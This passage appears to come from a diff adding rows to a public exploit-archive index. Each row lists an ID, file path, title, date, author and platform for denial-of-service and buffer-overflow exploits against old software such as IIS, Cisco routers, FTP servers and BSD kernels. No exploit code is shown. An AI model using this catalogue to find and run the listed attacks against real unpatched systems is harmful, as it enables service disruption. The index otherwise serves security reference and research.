Fenlason",dos,linux, +19820,exploits/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",dos,windows, +19827,exploits/windows/dos/19827.txt,"Microsoft Windows NT 4.0/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",dos,windows, +19963,exploits/windows/dos/19963.txt,"PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",dos,windows, +19834,exploits/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",dos,windows, +19835,exploits/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",dos,windows, +19843,exploits/windows/dos/19843.java,"AVM KEN! 1.3.10/1.4.30 - Remote Denial of Service",2000-04-12,eAX,dos,windows, +19850,exploits/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow",2000-04-16,"Michal Zalewski",dos,linux, +19853,exploits/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,dos,windows, +19854,exploits/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",dos,netware, +19856,exploits/windows/dos/19856.txt,"RealNetworks Real Server 7.0 / GameHouse dldisplay ActiveX control 0 - Denial of Service",2000-04-20,"Ussr Labs",dos,windows,7070 +19960,exploits/windows/dos/19960.txt,"Oracle Outside-In - '.FPX' File Parsing Heap Overflow",2012-07-20,"Francis Provencher",dos,windows, +19866,exploits/windows/dos/19866.pl,"DomsHttpd 1.0 - Remote Denial of Service",2012-07-16,"Jean Pascal Pereira",dos,windows, +19869,exploits/linux/dos/19869.txt,"Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4 / UoW imap 4.5 popd - Lock File Denial of Service",2000-04-19,"Alex Mottram",dos,linux, +19870,exploits/linux/dos/19870.pl,"CVS 1.10.7 - Local Denial of Service",2000-04-23,"Michal Szymanski",dos,linux, +19880,exploits/windows/dos/19880.txt,"Symantec pcAnywhere 8.0.1/8.0.2/9.0/9.2 - Port Scan Denial of Service",2000-04-25,Vacuum,dos,windows, +19884,exploits/windows/dos/19884.txt,"Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow",2000-05-01,"Ussr Labs",dos,windows, +19885,exploits/windows/dos/19885.txt,"Qualcomm Eudora 4.2/4.3 - Warning Message Circumvention",2000-04-28,"Bennett Haselton",dos,windows, +19896,exploits/bsd/dos/19896.c,"FreeBSD 3.4/4.0/5.0 / NetBSD 1.4 - Unaligned IP Option Denial of Service",2000-05-04,y3t1,dos,bsd, +19899,exploits/cgi/dos/19899.txt,"UltraBoard 1.6 - Denial of Service",2000-05-05,"Juan M. Bello Rivas",dos,cgi, +19907,exploits/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 - Malformed File Extension Denial of Service",2000-05-11,"Ussr Labs",dos,windows, +19919,exploits/hardware/dos/19919.c,"Cisco 7xx Series Router - Denial of Service",1999-03-11,Tiz.Telesup,dos,hardware, +19920,exploits/multiple/dos/19920.c,"Computalynx CProxy Server 3.3 SP2 - Buffer Overflow Denial of Service",2000-05-16,"HaCk-13 TeaM",dos,multiple, +19923,exploits/hardware/dos/19923.txt,"Cayman 3220-H DSL Router 1.0/GatorSurf 5.3 - Denial of Service",2000-05-17,cassius,dos,hardware, +19965,exploits/multiple/dos/19965.txt,"HP JetAdmin 6.0 - Printing Denial of Service",2000-05-24,"Ussr Labs",dos,multiple, +19938,exploits/beos/dos/19938.txt,"BeOS 5.0 - TCP Fragmentation Remote Denial of Service",2000-05-18,visi0n,dos,beos, +19940,exploits/windows/dos/19940.c,"Axent NetProwler 3.0 - IP Packets Denial of Service (1)",2000-05-18,"rain forest puppy",dos,windows, +19941,exploits/windows/dos/19941.casl,"Axent NetProwler 3.0 - IP Packets Denial of Service (2)",2000-05-18,"Pedro Quintanilha",dos,windows, +19950,exploits/linux/dos/19950.c,"XFree86 X11R6 3.3.5/3.3.6/4.0 Xserver - Denial of Service",2000-05-18,"Chris Evans",dos,linux, +19961,exploits/windows/dos/19961.txt,"Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow",2012-07-20,"Francis Provencher",dos,windows, +19962,exploits/windows/dos/19962.txt,"Oracle Outside-In JP2 - File Parsing Heap Overflow",2012-07-20,"Francis Provencher",dos,windows, +19974,exploits/windows/dos/19974.c,"Microsoft Windows Media Services 4.0/4.1 - Denial of Service (MS00-038)",2000-05-31,"Kit Knox",dos,windows, +19977,exploits/multiple/dos/19977.txt,"Real Networks Real Server 7.0/7.0.1/8.0 Beta - view-source Denial of Service",2000-06-01,"Ussr Labs",dos,multiple, +19982,exploits/bsd/dos/19982.c,"FreeBSD 3.x/4.0/5.0 / NetBSD 1.4.1/1.4.2 / OpenBSD 2.x - Denial of Service",2000-06-01,"Ussr Labs",dos,bsd, +19984,exploits/multiple/dos/19984.c,"Eterm 0.8.10 / rxvt 2.6.1 / PuTTY 0.48 / X11R6 3.3.3/4.0 - Denial of Service",2000-05-31,"Kit Knox",dos,multiple, +19986,exploits/windows/dos/19986.txt,"Oxide WebServer 2.0.4 - Denial of Service",2012-07-20,"SecPod Research",dos,windows, +19987,exploits/linux/dos/19987.py,"ptunnel 0.72 - Remote Denial of Service",2012-07-20,st3n,dos,linux, +19988,exploits/windows/dos/19988.pl,"httpdx 1.5.4 - HTTP Server Remote Denial of Service",2012-07-20,st3n,dos,windows, +19994,exploits/windows/dos/19994.c,"Check Point Software Firewall-1 4.0/1 4.1 - Fragmented Packets Denial of Service",2000-05-23,phonix,dos,windows, +19996,exploits/multiple/dos/19996.txt,"ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service",2000-06-07,"Stuart McClure",dos,multiple, +20005,exploits/windows/dos/20005.c,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (1)",2000-06-08,"Renaud Deraison",dos,windows, +20006,exploits/windows/dos/20006.nasl,"Microsoft Windows NT 4.0 - Remote Registry Request Denial of Service (MS00-040) (2)",2000-06-08,"Renaud Deraison",dos,windows, +20015,exploits/windows/dos/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 - Denial of Service",2000-07-15,"Ussr Labs",dos,windows, +20016,exploits/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple Denial of Service Vulnerabilities",2000-06-16,Prizm,dos,windows, +20017,exploits/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",dos,windows, +20020,exploits/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL Denial of Service",2000-06-16,Craig,dos,windows, +20023,exploits/linux/dos/20023.c,"Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",dos,linux, +20025,exploits/linux/dos/20025.txt,"Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service",2000-06-08,"Mike Murray",dos,linux, +20026,exploits/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,dos,linux, +20039,exploits/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - Denial of Service",2000-06-25,"MDMA Crew",dos,windows, +20047,exploits/windows/dos/20047.txt,"Microsoft Windows Server 2000 - Telnet Server Denial of Service",2000-06-30,"SecureXpert Labs",dos,windows, +20049,exploits/windows/dos/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 - Resource Exhaustion (Denial of Service)",2000-06-30,"SecureXpert Labs",dos,windows, +20050,exploits/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 - Spoofed Source Denial of Service",2000-07-05,lore,dos,hardware, +20051,exploits/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service",2000-06-30,"Marc of eEye",dos,windows, +20052,exploits/multiple/dos/20052.txt,"Centrinity FirstClass 5.77 - Intranet Server Long Header Denial of Service",2000-06-27,"Adam Prime",dos,multiple, +20054,exploits/windows/dos/20054.pl,"West Street Software LocalWEB HTTP Server 1.2 - Buffer Overflow",2000-07-04,"Ussr Labs",dos,windows, +20069,exploits/windows/dos/20069.pl,"Texas Imperial Software WFTPD 2.4.1 - RNTO Denial of Service",2000-07-11,"Blue Panda",dos,windows, +20071,exploits/cgi/dos/20071.c,"Mirabilis ICQ 0.99/98.0 a/2000.0 A/99a - Remote Denial of Service",2000-03-10,"Charles Chear",dos,cgi, +20072,exploits/novell/dos/20072.txt,"Novell Netware 5.0 SP5/6.0 SP1 - SMDR.NLM Denial of Service",2000-07-11,"Dimuthu Parussalla",dos,novell, +20080,exploits/windows/dos/20080.c,"Computer Software Manufaktur Alibaba 2.0 - Denial of Service",2000-07-18,wildcoyote,dos,windows, +20090,exploits/hardware/dos/20090.txt,"HP JetDirect J3111A - Invalid FTP Command Denial of Service",2000-07-19,"Peter Grundl",dos,hardware, +20094,exploits/windows/dos/20094.txt,"NullSoft Winamp 2.64 - '.m3u' Playlist Buffer Overflow",2001-01-17,"Pauli Ojanpera",dos,windows, +20098,exploits/multiple/dos/20098.txt,"Netscape Communicator 4.x - JPEG-Comment Heap Overwrite",2000-07-25,"Solar Designer",dos,multiple, +20099,exploits/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - Denial of Service",2000-07-25,wildcoyote,dos,windows, +20100,exploits/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",dos,windows, +20101,exploits/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",dos,windows, +20102,exploits/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - Unauthenticated MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",dos,windows, +43147,exploits/hardware/dos/43147.sh,"D-Link DIR-605L < 2.08 - Denial of Service",2017-11-14,"Enrique Castillo",dos,hardware, +20167,exploits/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,dos,linux, +20175,exploits/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",dos,windows, +20178,exploits/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 - Denial of Service",2000-08-19,sinfony,dos,multiple, +20192,exploits/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions Denial of Service",2000-09-06,"Dixie Flatline",dos,unix, +20217,exploits/linux/dos/20217.txt,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service",2000-09-09,"zenith parsec",dos,linux, +20219,exploits/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,dos,windows, +20221,exploits/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",dos,windows, +20225,exploits/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",dos,windows, +20226,exploits/freebsd/dos/20226.c,"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",dos,freebsd, +20228,exploits/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,dos,windows, +20229,exploits/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",dos,multiple, +20233,exploits/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",dos,windows, +20239,exploits/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP Denial of Service",2000-09-26,DCIST,dos,multiple, +20254,exploits/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)",2000-10-03,"BindView's Razor Team",dos,windows, +20255,exploits/windows/dos/20255.txt,"Microsoft Windows NT 4.0/2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",dos,windows, +20271,exploits/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,dos,openbsd, +20272,exploits/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,dos,windows, +20282,exploits/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,dos,windows, +20289,exploits/windows/dos/20289.txt,"Microsoft NetMeeting 3.0.1 4.4.3385 - Remote Desktop Sharing Denial of Service",2000-10-13,"Kirk Corey",dos,windows, +20295,exploits/windows/dos/20295.txt,"AOL Products downloadUpdater2 Plugin - 'SRC' Remote Code Execution",2012-08-06,rgod,dos,windows, +20304,exploits/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",dos,windows, +20307,exploits/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",dos,windows, +20310,exploits/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,dos,windows, +20311,exploits/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,dos,windows, +20323,exploits/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",dos,hardware, +20328,exploits/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",dos,hardware, +20331,exploits/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,dos,hardware, +20332,exploits/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service (Perl)",1998-03-17,Rootshell,dos,hardware, +20336,exploits/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - Denial of Service",2000-10-30,"Foundstone Labs",dos,multiple, +43153,exploits/windows/dos/43153.js,"Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check",2017-11-16,"Google Security Research",dos,windows, +20373,exploits/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,dos,hp-ux, +20376,exploits/unix/dos/20376.txt,"Wietse Venema Rpcbind Replacement 2.1 - Denial of Service",1998-11-13,"Patrick Gilbert",dos,unix, +20379,exploits/windows/dos/20379.txt,"Apple WebObjects Developer NT4 IIS4.0 CGI-adapter 4.5 - Developer Remote Overflow",2000-04-04,"Bruce Potter",dos,windows, +20388,exploits/linux/dos/20388.txt,"ISC BIND 8.2.2-P5 - Denial of Service",2000-11-01,"Fabio Pietrosanti",dos,linux, +20400,exploits/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Denial of Service",2000-11-10,sozni,dos,cgi, +21041,exploits/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5 / Netscape Communicator 4 - IMG Tag Denial of Service",2001-06-19,"John Percival",dos,multiple, +20403,exploits/windows/dos/20403.txt,"Small HTTP Server 2.0 1 - Non-Existent File Denial of Service",2000-11-14,"403-security team",dos,windows, +20432,exploits/windows/dos/20432.txt,"Network Associates Webshield SMTP 4.5 - Invalid Outgoing Recipient Field Denial of Service",2000-11-23,"Jari Helenius",dos,windows, +20437,exploits/windows/dos/20437.c,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,dos,windows, +20438,exploits/windows/dos/20438.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,dos,windows, +20439,exploits/windows/dos/20439.pl,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,dos,windows, +20440,exploits/windows/dos/20440.txt,"Microsoft Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4)",1997-05-07,"maddog & lerper",dos,windows, +20464,exploits/windows/dos/20464.py,"Spytech NetVizor 6.1 - 'services.exe' Denial of Service",2012-08-12,loneferret,dos,windows, +20470,exploits/windows/dos/20470.txt,"IBM DB2 - Universal Database for Windows NT 6.1/7.1 SQL Denial of Service",2000-12-05,benjurry,dos,windows, +20473,exploits/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x / Catalyst 5000 4.5/5.x / Catalyst 6000 5.x - Memory Leak Denial of Service",2000-12-06,blackangels,dos,hardware, +20479,exploits/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)",2012-08-13,kingcope,dos,linux, +20484,exploits/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - 'win-c-sample.exe' Buffer Overflow",1997-01-06,"Solar Designer",dos,windows, +20487,exploits/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",dos,hardware, +20494,exploits/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,dos,linux, +20508,exploits/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service",1999-04-27,"Simon Helson",dos,windows, +20509,exploits/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 - SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,dos,hardware, +20515,exploits/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption (Denial of Service)",2000-12-13,"Ilia Sprite",dos,windows, +20518,exploits/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service",2000-12-21,"SNS Research",dos,windows, +20531,exploits/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",dos,multiple, +20532,exploits/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,dos,sco, +20534,exploits/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",dos,multiple, +20535,exploits/linux/dos/20535.txt,"ReiserFS 3.5.28 (Linux Kernel) - Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",dos,linux, +20536,exploits/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,dos,linux, +20705,exploits/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",dos,multiple, +20552,exploits/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",dos,windows, +20558,exploits/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",dos,multiple, +20561,exploits/linux/dos/20561.pl,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (1)",1997-06-12,"Frank DENIS",dos,linux, +20562,exploits/linux/dos/20562.c,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service (2)",1997-06-12,"Wietse Venema",dos,linux, +20564,exploits/windows/dos/20564.txt,"Microsoft Windows NT 4.0 - SNMP-WINS Denial of Service",1997-10-07,CRouland,dos,windows, +20566,exploits/linux/dos/20566.c,"Linux Kernel 2.1.89/2.2.x - Zero-Length Fragment",1997-12-08,"John McDonald",dos,linux, +20613,exploits/windows/dos/20613.txt,"Microsoft Windows 98/2000 - UDP Socket Denial of Service",2001-02-06,"Georgi Guninski",dos,windows, +20644,exploits/hardware/dos/20644.c,"Marconi ASX-1000 - Administration Denial of Service",2001-02-19,"J.K. Garvey",dos,hardware, +20589,exploits/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service",2001-01-21,grazer,dos,windows, +20596,exploits/windows/dos/20596.c,"Microsoft Windows NT 4.0 - Networking Mutex Denial of Service",2001-01-24,"Arne Vidstrom",dos,windows, +20610,exploits/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet - Denial of Service",2000-10-31,"Allaire Security",dos,multiple, +20634,exploits/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 - Buffer Overflow",2001-02-15,joetesta,dos,windows, +20641,exploits/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 - Denial of Service",2001-02-20,"SNS Research",dos,windows, +20650,exploits/windows/dos/20650.txt,"Sapio WebReflex 1.55 - GET Denial of Service",2001-02-27,slipy,dos,windows, +20654,exploits/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration Denial of Service",2001-02-26,altomo,dos,hardware, +20655,exploits/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - Denial of Service",2001-02-27,slipy,dos,windows, +20656,exploits/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,dos,windows, +20659,exploits/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0b - Denial of Service",2001-03-01,"the Strumpf Noir Society",dos,multiple, +20662,exploits/windows/dos/20662.txt,"WhitSoft SlimServe HTTPd 1.1 - Get Denial of Service",2001-02-28,joetesta,dos,windows, +20664,exploits/windows/dos/20664.pl,"Microsoft IIS 5.0 - WebDAV Denial of Service",2001-03-08,"Georgi Guninski",dos,windows, +20681,exploits/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - Denial of Service",2001-01-22,honoriak,dos,windows, +20682,exploits/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - Denial of Service",2001-03-09,Phiber,dos,windows, +20696,exploits/windows/dos/20696.txt,"Alt-N MDaemon 3.5.6/5.0.7/6.x - IMAP Denial of Service",2001-03-23,nitr0s,dos,windows, +20728,exploits/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,dos,windows, +20734,exploits/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",dos,hardware, +20735,exploits/sco/dos/20735.txt,"SCO OpenServer 5.0.6 - lpadmin Buffer Overflow",2001-03-27,"Secure Network Operations",dos,sco, +20736,exploits/sco/dos/20736.txt,"SCO Open Server 5.0.6 - lpforms Buffer Overflow",2001-03-27,"Secure Network Operations",dos,sco, +20737,exploits/sco/dos/20737.txt,"SCO Open Server 5.0.6 - lpshut Buffer Overflow",2001-03-27,"Secure Network Operations",dos,sco, +20739,exploits/sco/dos/20739.txt,"SCO Open Server 5.0.6 - lpusers Buffer Overflow",2001-03-27,"Secure Network Operations",dos,sco, +20742,exploits/sco/dos/20742.txt,"SCO Open Server 5.0.6 - recon Buffer Overflow",2001-03-27,"Secure Network Operations",dos,sco, +20747,exploits/linux/dos/20747.txt,"Oracle Application Server 4.0.8.2 - ndwfn4.so Buffer Overflow",2001-04-11,"Fyodor Yarochkin",dos,linux, +20750,exploits/linux/dos/20750.txt,"Trend Micro Interscan VirusWall (Linux) 3.0.1 - Multiple Program Buffer Overflows",2001-04-13,"eeye security",dos,linux, +20753,exploits/cgi/dos/20753.txt,"IBM Websphere/Net.Commerce 3 - CGI-BIN Macro Denial of Service",2001-04-13,"ET LoWNOISE",dos,cgi, +20763,exploits/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy - Denial of Service",2001-04-16,"SecureXpert Labs",dos,windows, +20770,exploits/windows/dos/20770.txt,"GoAhead Software GoAhead WebServer (Windows) 2.1 - Denial of Service",2001-04-17,nemesystm,dos,windows, +20771,exploits/windows/dos/20771.txt,"Simpleserver WWW 1.0.x - AUX Directory Denial of Service",2001-04-17,nemesystm,dos,windows, +20779,exploits/windows/dos/20779.pl,"Oracle 8 Server - 'TNSLSNR80.EXE' Denial of Service",2001-04-18,r0ot@runbox.com,dos,windows, +20783,exploits/windows/dos/20783.txt,"Rit Research Labs 'The Bat!' 1.x - Missing Linefeeds Denial of Service",2001-04-18,3APA3A,dos,windows, +20784,exploits/windows/dos/20784.cpp,"Wireshark 1.6.0/1.8.2 - Buffer Overflow (PoC)",2012-08-24,X-h4ck,dos,windows, +20792,exploits/multiple/dos/20792.txt,"Mercury/NLM 1.4 - Buffer Overflow",2001-04-21,"Przemyslaw Frasunek",dos,multiple, +20802,exploits/windows/dos/20802.c,"Microsoft IIS 2.0/3.0 - Long URL Denial of Service",1997-06-21,"Andrea Arcangeli",dos,windows, +20810,exploits/multiple/dos/20810.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (1)",1997-11-20,m3lt,dos,multiple, +20811,exploits/multiple/dos/20811.cpp,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (2)",1997-11-20,"Konrad Malewski",dos,multiple, +20812,exploits/windows/dos/20812.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (3)",1997-11-20,m3lt,dos,windows, +20813,exploits/multiple/dos/20813.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (4)",1997-11-20,MondoMan,dos,multiple, +20814,exploits/windows/dos/20814.c,"FreeBSD 2.x / HP-UX 9/10/11 / Kernel 2.0.3 / Windows NT 4.0/Server 2003 / NetBSD 1 - 'land.c' loopback Denial of Service (5)",1997-11-20,"Dejan Levaja",dos,windows, +20821,exploits/hardware/dos/20821.txt,"Cisco HSRP - Denial of Service",2001-05-03,bashis,dos,hardware, +20824,exploits/hardware/dos/20824.txt,"Cisco Catalyst 2900 12.0 - '5.2'XU SNMP Empty UDP Packet Denial of Service",2001-05-03,bashis,dos,hardware, +20827,exploits/multiple/dos/20827.pl,"Hughes Technologies DSL_Vdns 1.0 - Denial of Service",2001-05-07,neme-dhc,dos,multiple, +20828,exploits/windows/dos/20828.txt,"SpyNet 6.5 Chat Server - Multiple Connection Denial of Service Vulnerabilities",2001-05-07,nemesystm,dos,windows, +20830,exploits/windows/dos/20830.txt,"T. Hauck Jana Server 1.45/1.46/2.0 - MS-DOS Device Name Denial of Service",2001-05-07,neme-dhc,dos,windows, +20834,exploits/windows/dos/20834.txt,"ElectroSoft ElectroComm 1.0/2.0 - Denial of Service",2001-05-07,nemesystm,dos,windows, +20844,exploits/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote Denial of Service",2001-05-10,"Jass Seljamaa",dos,osx, +20845,exploits/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote Denial of Service",2001-05-15,"Jass Seljamaa",dos,osx, +20846,exploits/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 - FTP Denial of Service (MS01-026)",2000-05-14,"Nelson Bunker",dos,windows, +20847,exploits/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,dos,hardware, +20852,exploits/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",dos,multiple, +20853,exploits/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",dos,multiple, +20854,exploits/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",dos,windows, +20870,exploits/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,dos,windows, +20883,exploits/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,dos,windows, +20904,exploits/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,dos,windows, +20907,exploits/windows/dos/20907.sh,"Microsoft Windows Server 2000 - Telnet 'Username' Denial of Service",2001-06-07,"Michal Zalewski",dos,windows, +20917,exploits/windows/dos/20917.txt,"Winlog Lite SCADA HMI system - Overwrite (SEH)",2012-08-29,Ciph3r,dos,windows, +20955,exploits/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,dos,windows, +20922,exploits/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",dos,osx, +20930,exploits/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,dos,windows, +20946,exploits/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,Cartel,dos,windows, 